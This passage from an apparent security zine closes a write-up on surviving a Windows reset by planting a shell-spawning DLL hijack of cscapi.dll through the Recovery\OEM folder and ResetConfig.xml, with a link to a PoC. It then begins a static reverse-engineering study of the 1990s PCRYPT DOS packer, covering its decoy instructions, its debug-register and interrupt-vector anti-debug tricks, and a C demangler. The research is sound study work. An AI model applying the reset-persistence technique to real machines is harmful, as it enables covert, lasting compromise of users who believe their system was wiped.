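The timeout constant 0x800705B4 in this excerpt is easier to read once it is split into its HRESULT fields. The following is a minimal sketch in portable C, assuming the standard HRESULT layout (severity in bit 31, facility in bits 16-26, code in the low 16 bits). The helper names are hypothetical and do not come from the binary:

```c
#include <stdint.h>

/* Field extractors for a 32-bit HRESULT. Helper names are illustrative only. */
static inline unsigned hr_severity(uint32_t hr) { return hr >> 31; }             /* 1 = failure  */
static inline unsigned hr_facility(uint32_t hr) { return (hr >> 16) & 0x7FFu; }  /* 11-bit field */
static inline unsigned hr_code(uint32_t hr)     { return hr & 0xFFFFu; }         /* error code   */
```

For 0x800705B4 this gives severity 1, facility 7 (FACILITY_WIN32) and code 0x5B4 (1460, ERROR_TIMEOUT), so the value reads as "the wait on the command timed out".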


If we inspect Command::Execute, the most important snippet of code that matters for our purposes is the following 
one: 


memset_0(&ProcessInfo, 0, sizeof(ProcessInfo));
ProcessInfo.cb = 104;                  // sizeof(STARTUPINFOW) on 64-bit
ProcessInfo.dwFlags = 256;             // 0x100 = STARTF_USESTDHANDLES
ProcessInfo.hStdInput = Input;
ProcessInfo.hStdOutput = commandObj;
ProcessInfo.hStdError = commandObj;
memset(&lpProcessInformation, 0, sizeof(lpProcessInformation));
CreateProcessW(..., CommandLineOutput->m_pchData, ..., 1, 0x8000000u,   // CREATE_NO_WINDOW
    ..., &ProcessInfo, &lpProcessInformation);


This is where the brainstorming started: 


Since we have code execution within this environment and we know the operation scheduling order from static
analysis, we can be sure that our stored payloads will be migrated from our “OldOs” to the “NewOs” OEM directory,
thanks to OpMigrateOemExtensions. Additionally, using a script file or a custom binary with particular
arguments, we can also “arbitrarily” migrate them from this “NewOs” OEM folder to a reliable “NewOs” directory
from which we are sure we can trigger filesystem persistence, thanks to OpRunExtension and the TargetOS registry
value that the environment itself provides for interacting with the to-be-recovered OS volume.


This idea seemed plausible from the start, given the execution performed by the operations described above, and
maybe it also looked way too easy to apply. By the end of my tests, however, there were a lot of considerations
that I had to keep in mind, which you will see in the next section.


1.2.3: Practical limitations regarding the environment for payload’s usage. 


From this point onwards, everything described here is based on the results of the experiments I did to test my
payload, rather than on reverse engineering specific binaries. The OOBE phase is the next step; it is in charge of
creating the new user while using the newly modified OS volume, which is why every change made during the
recovery process only shows up after the OOBE wizard has finished. However, because of the execution flow up
until this point, the new user's specific folders can't be accessed, since the payload migration has to be done
before this step even starts. With these logical assumptions in mind, the statement that I can migrate my payload
“arbitrarily” for code execution is not actually correct, since I can't copy it to the new user's specific
target directories such as \Users\<NewUsername>\AppData\Roaming\Microsoft\Windows\Start Menu\
Programs\Startup. Similarly, there are also constraints related to restrictive DACLs for
shared directories in a multiuser system, such as ProgramData\Microsoft\Windows\Start Menu\Programs\
StartUp, which of course limits where we can trigger our payload from in the recovered OS.


So what is a simple solution to this problem with the mentioned constraints? The answer is an old-fashioned dll
hijacking payload, particularly one that is reliable (a binary that is guaranteed to be loaded after the
reinstallation, inside the system root directory “<Drive Letter>:\Windows”). Of course there are possibly other
ways to achieve code execution by having access to this particular directory, but for this specific PoC, this was
the main route that I took. Staying on topic, there are a lot of such DLLs that could be used for this purpose, but
the one I decided to pick as an example was cscapi.dll, used by explorer.exe. (Special thanks to Dodo for pointing
me to this dll.)


I crafted a simple dll that spawned a shell, a ResetConfig.xml and, of course, the script to be executed, which
also triggers the migration of the payload, all stored inside Recovery\OEM. Eventually the whole process
described in the sections above is executed, and we get a command prompt after the OOBE phase for the newly
created account. The payload testing phase was quite interesting, but to put it briefly, it is recommended to
avoid anything that is not command line based. Finally, all of this can actually be figured out by just looking at
the MSDN documentation on ResetConfig.xml and Push-Button Reset, which is what I initially did before working on
the actual reversing process, in order to understand particular undocumented details of this environment and to
interact better with the resulting recovered OS. The basic strategy was: “Poking around things until something
particularly interesting appears.”


Conclusion: 


This was a brief writeup on how it is possible to survive and achieve code execution very easily if the reset is done
through local installation, even when it is set to “Remove files and clean the drive.” This took a while to reverse
engineer, since this environment, even if it looks similar to a usual Windows OS (both in kernel and user mode
components), has quirks of its own that required further research for my particular intentions.


The link for the SDK header file for IDA and an incredibly badly programmed PoC is here:
https://github.com/blackmassgroup/Black-Mass_v2 


Regarding other scenarios and limitations, it is important to keep in mind that I mainly tested this both in a VM
and in a regular Windows 10 Home OS. Possible integrated mitigations were not taken into consideration (and are
usually not set up in a default installation, even if they exist), but I am sure there is some policy to deal with
it. On the other hand, I have NOT tested it in other scenarios that could be used as well, such as
CloudResetScenario, which would match the case where the reset is done through a downloaded image.


It is most likely that it would work as well in those cases, but for now, I leave it as an exercise to the reader.
Present Day. Present Time. We are all connected 
This is probably my last public work in some months, but we will meet again soon in the future. 


Ukc4Z2JtOTBJR3hsZENCaGJubGIiMIl1 SUnSbGJHd2dlVzkxS UhSb1 lYUWdIVzkxSUdOaGJpZDBJR1J2SUdsMExn- 
bwpodHRwczovL3d3dy55b3VOdWJILmNvbS93YXRjaD92PTUKWTRZNDNXbVhj 


Special thanks to Jonas for the idea some months ago (although this was not precisely what I intended to achieve,
but progress is progress).

Additional references:

0.-Main start reference:
->https://learn.microsoft.com/en-us/windows-hardware/manufacture/desktop/push-button-reset-overview?view=windows-11

1.-IDA Pro shifted pointers (particularly used for CString/CSimpleString containers).
->Reference: https://hex-rays.com/blog/igors-tip-of-the-week-54-shifted-pointers/
->External header used: https://github.com/dblock/msiext/blob/master/externals/WinDDK/7600.16385.1/inc/atl71/atlsimpstr.h

2.-IDA Pro __cppobj structures (used in most rebuilt classes).
->Reference: https://www.hex-rays.com/products/ida/support/idadoc/1691.shtml

3.-Autopilot processes (good reference for OOBE binaries, did not add this to this paper):
->https://www.anoopcnair.com/windows-autopilot-in-depth-processes-part-3/

4.-WinPE additional information (used some of them for debugging particularly important components):
->https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-vista/cc721977(v=ws.10)
->https://oofhours.com/2020/12/03/windows-pe-startup-revisited/
->UPDATE: It seems @gerhart_x was able to find a way to debug WinRE more easily with LiveCloudKD
https://twitter.com/gerhart_x/status/1614708016049278978/photo/1

5.-Source for the image used for finding the different modules:
https://answers.microsoft.com/en-us/windows/forum/all/after-running-wsresetexe-this-shows-up/53e9e168-0465-43f4-ba81-4fc77b0a871c




Decrypting PCRYPT: Self-Curing Insomnia 
Authored by gorplop@sof.org 
.section .greetz

.asciz netspooky, everyone at vxug,
and of course MERLIN themselves


While going through various old tools I had collected, I found a DOS COM file. I was curious about how it works, so I
opened it in a disassembler. The file turned out to be an encrypted program, which decrypts itself in memory prior to
execution. I decided to read through the assembly to find out what exactly it does.


The program contained the following message that could be read when opening it in a hex editor: 


PCRYPT v3.44! Fast, c00l Com&ExeCryptor

UnPackable! :)
U try 2 unPack iT! :)

(C) MERLiN 1996-1997

Origin: AVK BBS|Work Time: 23:00-07:00
+7-XXX-XXX-XXXX

On AvK bB$ U can |eVERYdAY!|get the
Latest Version 0f PCRYPT!
Call & Enjoy!


(BBS phone number redacted because it surely does not work anymore.) 


The utility was clearly protected from reverse engineering. I wanted to understand how it works, to rewrite it for a
modern OS, so I started cracking the PCRYPT packer. I noticed that the code contains parts that do not make
sense at all, and parts that make sense but are riddled with decoy instructions that do not do anything. The code
also looked handwritten. I decided to take the challenge posed by the author and try to recover the original code
that was “encrypted”.


I used radare2 to disassemble the code, and wrote my own C programs that emulate the subsequent stages of
unpacking. This way, I could study the code contents as they were in memory after each stage was done.


As you will see, the code employs many anti-RE tricks of the era that prevent dynamic analysis, or even simple 
debugging. In fact, running this COM file crashes my QEMU VM. Because of this, all of my work was done as fully 
static analysis. 


I chose the r2 disassembler because of its feature of starting disassembly from the current view position, which
prevents it from being confused by the encrypted code. Ghidra and IDA are ok for this too if you manually mark
what is code and what is not. All my work was done on disassembly. Decompilation is futile, as the code has not
been generated by a compiler and the dummy instructions clutter up the resulting decompiled C code. There are
few to no functions in the code, too.


PCRYPT was a utility that protected your code from debugging and reverse engineering. Here’s a posting from 
gHOST Station BBS file list that gives a list of features that PCRYPT v3.44 has: 


PCRYPT-encryptor of COM and EXE-files! 
* Works fast. 
* Small size. 
* Protects from debugging. 
* Written fully in assembly. 
Tested against the following programs: 
[... list of tools ...] 


Also causes failure under ALL debuggers that use int 1 and int 3. Additionally PCRYPT
will collide with debuggers running in 386 mode, because from time to time it
overwrites registers dr0 - dr3.


PCR344U.RAR  13400  23-08-97
+------------------+ PCRYPT v3.44 +------------------+
| PCRYPT-Шифровщик COM и EXE-файлов
|
| Быстро работает.
| Небольшой размер.
| Защита от отладки.
| Полностью на Ассемблере.
|
| PCRYPT проверен на стойкость
| со следующими программами:
|   UUP v1.4;
|   TSUP v1.6;
|   UPC v1.03;
|   Intruder v1.20, v1.30;
|   CUP386 v3.0, v3.2, v3.3, v3.4 ;-)
|   XPACK -UX v1.49, v1.66-v1.67.k;
|   AutoHack v4.1, II v1.0, II v1.2;
|   TD386,
|   DosDebug;
|   Insight v1.01;
|   Axe-Hack v2.3;
|   Softice v2.80;
|   Meff 18-03-1996;
|   D(ALf) 1.0 Betta;
|   MegaDebugger v1.00;
|   AVPUTIL v1.0b, v2.1, v2.2;
|   DeGlucker v0.03, v0.03a, v0.03b;
|
| А также не работает под ВСЕМИ
| отладчиками, использующими int 3
| и int 1. Также PCRYPT будет мешать
| работать отладчикам, работающим
| в 386 режиме, т.к. он время от
| времени уничтожает содержимое
| отладочных регистров dr0 - dr3.
|
| Copyright (c) 1996-1997 by MERLiN.
|
| Hatch by Michail A.Baikov (/1305)
+------------------------------------[ 20 Aug 1997 ]-+


There is an unpacker available for PCRYPT, so the encryption scheme has been cracked. It is simple anyway. But I
think it is really interesting to fully understand the encryption implementation, as well as the anti-reverse engineering
tricks that were employed in the 386 era. As a side note, the same BBS lists release v3.45, which was published only
12 days after the one used in this file...


But let’s not get ahead of ourselves, and instead, dive into the binary. 


Stage 1


The COM file starts with a jump to what I will call “Stage 1”. It's listed below. This is what you would see
when you open it in a disassembler.


0000:0100  e93705          jmp 0x63a

0000:063a  7b00            jnp 0x63c
0000:063c  6685c9          test ecx, ecx
0000:063f  6a00            push 0
0000:0641  88d2            mov dl, dl
0000:0643  810a0000        or word [bp + si], 0
0000:0647  e80000          call 0x64a
0000:064a  7500            jne 0x64c
0000:064c  817a070000      cmp word [bp + si + 7], 0
0000:0651  84c0            test al, al
0000:0653  665a            pop edx
0000:0655  7900            jns 0x657
0000:0657  81c26000        add dx, 0x60
0000:065b  0f23c5          mov dr0, ebp
0000:065e  7d00            jge 0x660
0000:0660  2e670112        add word cs:[edx], dx
0000:0664  89d2            mov dx, dx
0000:0666  2e6781020400    add word cs:[edx], 4
0000:066c  80f300          xor bl, 0
0000:066f  81330000        xor word [bp + di], 0
0000:0673  81c20400        add dx, 4
0000:0677  89c9            mov cx, cx
0000:0679  2e678a0a        mov cl, byte cs:[edx]
0000:067d  80e9b2          sub cl, 0xb2
0000:0680  7900            jns 0x682
0000:0682  f6d1            not cl
0000:0684  80700d00        xor byte [bx + si + 0xd], 0
0000:0688  80c1e2          add cl, 0xe2
0000:068b  81830e4f0000    add word [bp + di + 0x4f0e], 0
0000:0691  56              push si
0000:0692  5e              pop si
0000:0693  808511fe00      add byte [di - 0x1ef], 0
0000:0698  7300            jae 0x69a
0000:069a  2e67880a        mov byte cs:[edx], cl
0000:069e  6685c0          test eax, eax
0000:06a1  84c0            test al, al
0000:06a3  7900            jns 0x6a5
0000:06a5  42              inc dx
0000:06a6  7b00            jnp 0x6a8
0000:06a8  81fa4603        cmp dx, 0x346
0000:06ac  75c9            jne 0x677
0000:06ae  42              inc dx
0000:06af  3d3c75          cmp ax, 0x753c
0000:06b2  8d29            lea bp, [bx + di]
0000:06b4  93              xchg ax, bx
0000:06b5  74ab            je 0x662


You can notice that it contains some instructions which are valid, but do not change the execution of the program at 
all. For example, the numerous jump instructions, with random condition codes, that jump to the next instruction (So 
the program flow does not change whether the jump was to be taken or not). Other examples of these decoys are 
the multiple mov instructions that move a register to itself or various xor instructions that XOR some location with 
zero and others. These instructions are there just to confuse decompilers. 
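
Two of the decoy patterns described above are regular enough to be recognized mechanically. The following is a minimal sketch in C, not part of the original tooling; the function name is hypothetical, and it only covers short conditional jumps with a zero displacement and register-to-register mov with identical operands. Prefixes and the other decoy forms (xor/or/add with zero, test) are deliberately ignored:

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Returns true if the n bytes at p begin with one of two simple decoys:
 *   - Jcc rel8 (opcodes 0x70..0x7f) with displacement 0, which lands on the
 *     next instruction whether or not the jump is taken
 *   - mov r, r (opcodes 0x88..0x8b) whose ModRM byte has mod == 11b and
 *     reg == rm, i.e. a register moved to itself */
bool is_simple_decoy(const uint8_t *p, size_t n)
{
    if (n < 2)
        return false;

    uint8_t op = p[0];
    uint8_t arg = p[1];

    if (op >= 0x70 && op <= 0x7f)
        return arg == 0x00;

    if (op >= 0x88 && op <= 0x8b) {
        uint8_t mod = arg >> 6;
        uint8_t reg = (arg >> 3) & 7;
        uint8_t rm  = arg & 7;
        return mod == 3 && reg == rm;
    }
    return false;
}
```

On the listing above, 7b 00 (jnp to the next instruction), 88 d2 (mov dl, dl) and 89 c9 (mov cx, cx) are flagged, while 75 c9 (the real loop jump) is not.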


Next is the stage 1 disassembled with all the decoy instructions removed. Let’s analyze how it works. 


With decoy insns removed: 


;; CS = 0000 for what we care (points at program)
;; DS = 0000
;; ES = 0000
;; SS = 0000
;; stack bytes in the comments are listed top of stack (TOS) first
      0000:063a  7b00          jnp 0x63c
;; start decryptor
      0000:063f  6a00          push 0                 ; stack = 00 00
      0000:0647  e80000        call 0x64a             ; stack = 4a 06 00 00
      0000:0653  665a          pop edx                ; stack = empty; edx = 0000 064a
      0000:0657  81c26000      add dx, 0x60           ; dx = 0x64a+0x60 = 0x6aa
      0000:065b  0f23c5        mov dr0, ebp           ; Write bp to breakpoint 0
(1)   0000:0660  2e670112      add word cs:[edx], dx  ; cs:edx = 0000:06aa, this
                                                      ; changes the comparison value
                                                      ; at 06a8 to 0a0e
      0000:0666  2e6781020400  add word cs:[edx], 4   ; Move dx pointer to start of
      0000:0673  81c20400      add dx, 4              ; encrypted code and change
                                                      ; the comparison value
.->   0000:0677  89c9          mov cx, cx             ; (functional NOP)
:     0000:0679  2e678a0a      mov cl, byte cs:[edx]  ; Load encrypted byte -> cl
:                                                     ; in the first iteration dx
:                                                     ; points to (2), where the
:                                                     ; 'encrypted' code starts
:     0000:067d  80e9b2        sub cl, 0xb2           ;
:     0000:0682  f6d1          not cl                 ; Mangle cl
:     0000:0688  80c1e2        add cl, 0xe2           ;
:     0000:0691  56            push si                ; Trigger breakpoint if any
:     0000:0692  5e            pop si                 ;
:     0000:069a  2e67880a      mov byte cs:[edx], cl  ; Write back
:     0000:06a5  42            inc dx                 ; Go to next byte
:     0000:06a8  81fa4603      cmp dx, 0x346          ;
:          06aa      4603                             ; --> becomes cmp dx, 0a0e,
:                                                     ;     then cmp dx, 0a12
`-<   0000:06ac  75c9          jne 0x677              ; Jump back up
(2)   0000:06ae  42            inc dx                 ; "ENCRYPTED" CODE STARTS HERE
      0000:06af  3d3c75        cmp ax, 0x753c
      0000:06b5  74ab          je 0x662


Stage 2: 868 demangled bytes 


When the DOS kernel loads a COM executable, it does so at offset 0x0100 in some code segment cs. The cs, ss,
ds, and es segment registers are set to the segment that the COM is loaded into. For the sake of our analysis, we
can assume that these segments are zero. In most DOS versions si and di are set to 0x0100, but cs is unknown.
Analyzing real mode code that uses segments is a difficult task to take up with modern disassembly tools. I found
that neither radare2 nor Ghidra knows how to deal with this correctly. Later, in stage 3, the code will do some tricks
related to the IVT, which is physically located in segment 0000. This should not be confused with the 0000 segment
that appears in the disassembly listings. I will try to make it clear. Segmented memory was truly a dark time in x86
programming.


The code above demangles 868 bytes starting at 0x06ae. It uses a clever trick to hide the number of bytes and the
address that it starts demangling at. The code is riddled with decoy instructions that do not do anything. It also
accesses 32-bit registers in 16-bit mode using the 0x66 and 0x67 operand size and address size prefixes. Let's go
through the code instruction by instruction:


0000:063f  6a00    push 0
0000:0647  e80000  call 0x64a


The call instruction is used to push the current instruction address to the stack, and the preceding push 0 is used to
prefix the value with 0x0000. A call to relative address +0 allows for writing PIC (position independent code), as it
gives you the current ip. It also acts as a decoy instruction, as it transfers execution to the instruction immediately
after it.


0000:064a  7500  jne 0x64c

One of the decoy instructions. No matter if the jump is taken or not, the execution continues at the next instruction.


0000:0653  665a      pop edx
0000:0655  7900      jns 0x657
0000:0657  81c26000  add dx, 0x60


This loads edx with the value 0000 064a from the stack. Now dx contains a pointer to the instruction right after the
call, i.e. the return address that the call pushed. The add instruction moves the pointer forward to 0x6aa.
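
The way two 16-bit pushes are consumed by a single 32-bit pop can be modelled with a few lines of C. This is only an illustrative sketch of the stack arithmetic, with hypothetical names (Stack, push16, pop32, getpc_edx), not an emulator of the real CPU:

```c
#include <stdint.h>

/* Tiny model of a real-mode stack: 16 bytes, growing downwards. */
typedef struct {
    uint8_t  mem[16];
    unsigned sp;                 /* index of the current top-of-stack byte */
} Stack;

static void push16(Stack *s, uint16_t v)
{
    s->sp -= 2;
    s->mem[s->sp]     = (uint8_t)(v & 0xff);   /* little-endian: low byte first */
    s->mem[s->sp + 1] = (uint8_t)(v >> 8);
}

static uint32_t pop32(Stack *s)
{
    uint32_t v = (uint32_t)s->mem[s->sp]
               | ((uint32_t)s->mem[s->sp + 1] << 8)
               | ((uint32_t)s->mem[s->sp + 2] << 16)
               | ((uint32_t)s->mem[s->sp + 3] << 24);
    s->sp += 4;
    return v;
}

/* Models: push 0; call next (pushes return_ip); pop edx; add dx, delta */
uint32_t getpc_edx(uint16_t return_ip, uint16_t delta)
{
    Stack s = { {0}, 16 };
    push16(&s, 0x0000);          /* becomes the high word of edx */
    push16(&s, return_ip);       /* becomes the low word of edx  */
    uint32_t edx = pop32(&s);
    uint16_t dx = (uint16_t)(edx + delta);   /* add dx, imm16 touches only dx */
    return (edx & 0xffff0000u) | dx;
}
```

With return_ip = 0x064a and delta = 0x60 the model returns 0x000006aa, the pointer used by the following instructions.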


0000:065b  0f23c5  mov dr0, ebp


dr0 through dr3 contain 4 hardware breakpoints for the CPU. This instruction overwrites the first breakpoint with the
current ebp value. By default breakpoints only trigger when the address matches on instruction execution. This is
controlled by the RWn field in debug register dr7. If the program is running inside a debugger (or, more correctly
for DOS, if a debugger is running), then the debugger might have changed the RW0 field to trigger the breakpoint on
memory access (write or read/write). This, in conjunction with the push si, pop si pair, would cause a memory write
at ebp (the stack is empty at this point), trigger the breakpoint and confuse the debugger (likely unaware that its
breakpoint was changed). The push/pop pair is inside the demangler loop, which makes it likely that someone who
wants to debug this program would set a memory breakpoint here.


If a debugger is not running, this booby trap has no effect because the default for breakpoints is to trigger on 
instruction execution. 
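
For reference, the RWn field mentioned above can be decoded from a dr7 value as follows. This is a small sketch based on the documented dr7 layout (enable bits Ln/Gn at bits 2n and 2n+1, the two-bit R/Wn field at bits 16+4n); the function and constant names are my own:

```c
#include <stdint.h>

/* Meaning of the two-bit R/Wn field in dr7. */
enum {
    DR_BREAK_EXEC  = 0,   /* break on instruction execution only (the default) */
    DR_BREAK_WRITE = 1,   /* break on data writes                              */
    DR_BREAK_IO    = 2,   /* undefined on the 386, I/O access on later CPUs    */
    DR_BREAK_RW    = 3    /* break on data reads or writes                     */
};

/* R/Wn field of breakpoint n (0..3): bits 16+4n and 17+4n of dr7. */
unsigned dr7_rw(uint32_t dr7, unsigned n)
{
    return (dr7 >> (16 + 4 * n)) & 3u;
}

/* Non-zero if breakpoint n is enabled locally (Ln) or globally (Gn). */
int dr7_enabled(uint32_t dr7, unsigned n)
{
    return ((dr7 >> (2 * n)) & 3u) != 0;
}
```

The booby trap only matters when dr7_enabled(dr7, 0) is true and dr7_rw(dr7, 0) is DR_BREAK_WRITE or DR_BREAK_RW, which is the state a debugger with an active memory breakpoint would leave behind.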


0000:0660  2e670112  add word cs:[edx], dx  ; cs:edx = 0000:06aa


This instruction adds the value of dx to the word at address dx. That address falls in the middle of the compare
instruction (at 06a8), effectively changing the immediate operand of the compare to 0x0a0e.


0000:0666  2e6781020400  add word cs:[edx], 4
0000:0673  81c20400      add dx, 4


The first add instruction increases the immediate operand by 4. The second add changes the value in dx accordingly,
which moves cs:edx to 0x6ae. That address is immediately after the jne 0x677, which ends the loop. It's where the
‘encrypted’ code starts.
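
The self-modification can be written down as plain 16-bit arithmetic. The sketch below is my own paraphrase of the three add instructions, with hypothetical names; the stored immediate and the pointer are parameters so that different readings of the listing can be tried:

```c
#include <stdint.h>

typedef struct {
    uint16_t cmp_imm;   /* immediate of "cmp dx, imm16" after patching */
    uint16_t dx;        /* dx on loop entry: first byte to demangle    */
} Stage1Setup;

/* imm is the compare immediate as stored in the file; dx points at it. */
Stage1Setup stage1_setup(uint16_t imm, uint16_t dx)
{
    Stage1Setup r;
    imm = (uint16_t)(imm + dx);   /* add word cs:[edx], dx */
    imm = (uint16_t)(imm + 4);    /* add word cs:[edx], 4  */
    dx  = (uint16_t)(dx + 4);     /* add dx, 4             */
    r.cmp_imm = imm;
    r.dx = dx;
    return r;
}
```

With dx = 0x06aa and a stored immediate of 0x0364 (868 decimal) this gives a loop that runs from 0x06ae up to 0x0a12, which are the values used in the text. The disassembly as printed shows the immediate as 0x346; under the same arithmetic that value would end the loop at 0x09f4 instead, so the two readings should not be mixed.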


0000:0679  2e678a0a  mov cl, byte cs:[edx]  ; Load encrypted byte -> cl
0000:067d  80e9b2    sub cl, 0xb2           ;
0000:0682  f6d1      not cl                 ; Mangle cl
0000:0688  80c1e2    add cl, 0xe2           ;
0000:069a  2e67880a  mov byte cs:[edx], cl  ; Write back
0000:06a5  42        inc dx


The main loop consists of 6 instructions that load a single byte from the ‘encrypted’ code, demangle it and write it 
back, then increase dx so that cs:edx points at the next byte to be processed. 
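
The three mangling instructions collapse into a single subtraction. Since not x equals -x - 1 modulo 256, we get not(b - 0xb2) + 0xe2 = 0xb2 - b - 1 + 0xe2 = 0x193 - b, which is 0x93 - b modulo 256. A short C sketch (function names are mine) that keeps both forms side by side:

```c
#include <stdint.h>

/* Literal transcription of the three instructions in the loop. */
uint8_t stage1_demangle(uint8_t b)
{
    b = (uint8_t)(b - 0xb2);   /* sub cl, 0xb2 */
    b = (uint8_t)~b;           /* not cl       */
    b = (uint8_t)(b + 0xe2);   /* add cl, 0xe2 */
    return b;
}

/* Algebraically equivalent closed form: 0x93 - b (mod 256). */
uint8_t stage1_demangle_short(uint8_t b)
{
    return (uint8_t)(0x93 - b);
}
```

Because 0x93 - (0x93 - b) = b, the transformation is its own inverse, so the same routine would also serve as the mangler. As a sanity check, the bytes 42 3d 3c 75 8d 29 93 74 ab found at 0x6ae in the stage 1 listing map to 51 56 57 1e 06 6a 00 1f e8, which are the opcodes push cx, push si, push di, push ds, push es, push 0, pop ds and the start of a call.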


0000:06a8  81fa4603  cmp dx, 0x346
0000:06ac  75c9      jne 0x677


A compare and jump instruction ends the loop. Note that the comparison immediate operand will be different by the
time it gets executed for the first time, because it was changed by the adds at 660 and 666. The loop ends “Stage 1”
of this encryptor. When dx == 0x0a12, the code following the loop will be fully demangled and the CPU will start
executing it.


Now that we know the basic operations that stage1 performs, we can make a program that demangles the code. 


/* The usual boilerplate code is omitted. The input file (raw COM) is loaded
   into a uint8_t array (memory) before the loop below runs. */

#include <stdint.h>

#define ST2_LEN 868
#define ST2_OFFS 0x5ae /* assumption: file loaded at memory[0], so 0x6ae - 0x100 */
#define BUFSZ 4096

int main(int argc, char **argv) {
    uint8_t memory[BUFSZ] = {0};
    int count;

    //usual stuff, open file, load into memory array

    //Decode ST2_LEN bytes from input file starting at memory offset 0x6ae
    //(COM file offset 0x5ae)
    count = 0;
    while (count < ST2_LEN) {
        uint8_t b = memory[count + ST2_OFFS];
        b -= 0xb2;
        b = ~b;
        b += 0xe2;
        memory[count + ST2_OFFS] = b;
        count++;
    }

    //Save memory to a new file, the usual stuff.
    return 0;
}


After we compile this program and run it on the COM file, it will produce another binary which reflects the
memory contents as they were just after the loop ends. The demangled payload starts at 0x6ae and ends at 0xa12. We
can open the resulting file in a disassembler and seek to 0x6ae. Note that the COM is loaded at an offset of 0x100,
so we need to load our file into the disassembler at the same offset. In r2, you can pass a second argument to the
open command like this:


[0000:0000]> o past_stage1.bin 0x100


Now we can analyze the descrambled code of stage 2. 


Stage 2 starts at 0x6ae. In our analysis, we need to consider the register file contents at the end of stage 1. We can
find them by quickly skimming through the stage 1 code:


;; dx = 0a12
;; di = 0x100 ds = 0x100 si = 0x100 es = 0x100 ch = ?? cl = decrypted byte


Here is the full stage 2 disassembly: 


      0000:06ae  51        push cx
      0000:06af  56        push si
      0000:06b0  57        push di
      0000:06b1  1e        push ds
      0000:06b2  06        push es
      0000:06b3  6a00      push 0
      0000:06b5  1f        pop ds
      0000:06b6  e80000    call 0x6b9
      0000:06b9  58        pop ax
      0000:06ba  055500    add ax, 0x55
      0000:06bd  a30400    mov word [4], ax
      0000:06c0  8c0e0600  mov word [6], cs
      0000:06c4  0e        push cs
      0000:06c5  1f        pop ds
      0000:06c6  0e        push cs
      0000:06c7  07        pop es
      0000:06c8  9c        pushf
      0000:06c9  58        pop ax
      0000:06ca  80cc01    or ah, 1
      0000:06cd  50        push ax
      0000:06ce  9d        popf
      0000:06cf  e80000    call 0x6d2
      0000:06d2  5e        pop si
      0000:06d3  83c667    add si, 0x67
      0000:06d6  90        nop
      0000:06d7  8bde      mov bx, si
      0000:06d9  53        push bx
      0000:06da  e80000    call 0x6dd
      0000:06dd  5a        pop dx
      0000:06de  81c21703  add dx, 0x317
      0000:06e2  8bda      mov bx, dx
      0000:06e4  81c3ee01  add bx, 0x1ee
      0000:06e8  fc        cld
      0000:06e9  8bfe      mov di, si
      0000:06eb  b9bb02    mov cx, 0x2bb
      0000:06ee  33c0      xor ax, ax
.->   0000:06f0  ac        lodsb al, byte [si]
:     0000:06f1  32c4      xor al, ah
:     0000:06f3  e82f00    call 0x725
:
:     0000:0725  56        push si
:     0000:0726  8bf2      mov si, dx
:     0000:0728  3bf3      cmp si, bx
: ,-< 0000:072a  7508      jne 0x734
: |   0000:072c  8bf3      mov si, bx
: |   0000:072e  81eeee01  sub si, 0x1ee
: |   0000:0732  8bd6      mov dx, si
: `-> 0000:0734  3204      xor al, byte [si]
:     0000:0736  42        inc dx
:     0000:0737  5e        pop si
:     0000:0738  c3        ret
:
:     0000:06f6  fec4      inc ah
:     0000:06f8  aa        stosb byte es:[di], al
`-<   0000:06f9  e2f5      loop 0x6f0

      0000:06d3            pop bx
      0000:06d4            pop es
      0000:06d5            pop ds
      0000:06d6            pop di
      0000:06d7            pop si
      0000:06d8            pop cx
      0000:06d9            add bx, 0x10
      0000:06dc  8cc8      mov ax, cs
      0000:06de            dec ax
      0000:06df            push ax
      0000:06e0            push bx
      0000:06e1            xor bx, bx
      0000:06e3            xor ax, ax
      0000:06e5            retf


Stage 2 prelude starts with some heavy stack operations. We have to keep track of the stack to have a clear view of 
the register file at the end of this stage. I’ve commented the listing with the stack contents and the stack depth: 


                      ; <--stack-- (amount of words pushed)
0000:06ae  push cx    ; ?? xx                                  (1)
0000:06af  push si    ; 00 01 ?? xx                            (2)
0000:06b0  push di    ; 00 01 00 01 ?? xx                      (3)
0000:06b1  push ds    ; 00 01 00 01 00 01 ?? xx                (4)
0000:06b2  push es    ; 00 01 00 01 00 01 00 01 ?? xx          (5)
0000:06b3  push 0     ; 00 00 00 01 00 01 00 01 00 01 ?? xx


This last instruction was quite problematic for me. It is encoded as 6a 00, which is the ‘push imm8’ instruction. I
checked it carefully and I have to criticize the Intel Software Developer's Manual. This instruction is called “Push
immediate byte”, and you would think that this is what it does. That's wrong: the 386/x86 has no single-byte stack
operations. Instead, it sign-extends the byte to a word and then pushes that. This operation is also not clearly
documented in the pseudocode section for the PUSH instruction, as there is no case listed for when the operand
size is 8. If we assumed that this pushes a single byte, then the stack contents would not make sense at the end of
this stage.
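
The sign extension performed by push imm8 with a 16-bit operand size is simple to state in C. A minimal sketch, with a function name of my own choosing:

```c
#include <stdint.h>

/* Word that "push imm8" (opcode 6a ib) places on the stack when the
 * operand size is 16 bits: the immediate byte, sign-extended. */
uint16_t push_imm8_value(uint8_t imm8)
{
    /* If bit 7 is set, the upper byte is filled with ones. */
    return (imm8 & 0x80) ? (uint16_t)(0xff00u | imm8) : (uint16_t)imm8;
}
```

For the 6a 00 seen here the pushed word is 0x0000, so two zero bytes land on the stack; a hypothetical 6a 80 would push 0xff80.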


0000:06b5  1f        pop ds            ; ds = 0000
0000:06b6  e80000    call 0x6b9        ; b9 06 00 01 00 01 00 01 00 01 ?? xx
0000:06b9  58        pop ax            ; ax = 6b9
                                       ; stack = 00 01 00 01 00 01 00 01 ?? xx
0000:06ba  055500    add ax, 0x55      ; ax = 70e
0000:06bd  a30400    mov word [4], ax  ; Debug interrupt takeover
0000:06c0  8c0e0600  mov word [6], cs  ;
0000:06c4  0e        push cs           ; 00 01 00 01 00 01 00 01 00 01 ?? xx
0000:06c5  1f        pop ds            ; ds = 100  ds := cs
0000:06c6  0e        push cs           ; 00 01 00 01 00 01 00 01 00 01 ?? xx
0000:06c7  07        pop es            ; es = 100  es := cs
                                       ; stack = 00 01 00 01 00 01 00 01 ?? xx


Here we can see the “call next instruction” trick again, which lets us save the instruction pointer to the stack. I will
come back to the two mov instructions in a moment. Let's continue our analysis, noting that the last 4
instructions here set ds and es to the code segment value.
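
As a reminder of why offsets 4 and 6 matter when ds is 0: each real-mode interrupt vector occupies 4 bytes at linear address 4 * n, holding the handler offset followed by the handler segment. Addresses 4 and 6 are therefore the two halves of vector 1, the single-step/debug vector. The sketch below models this on a copy of the first 1 KiB of memory; the type and function names are my own:

```c
#include <stdint.h>
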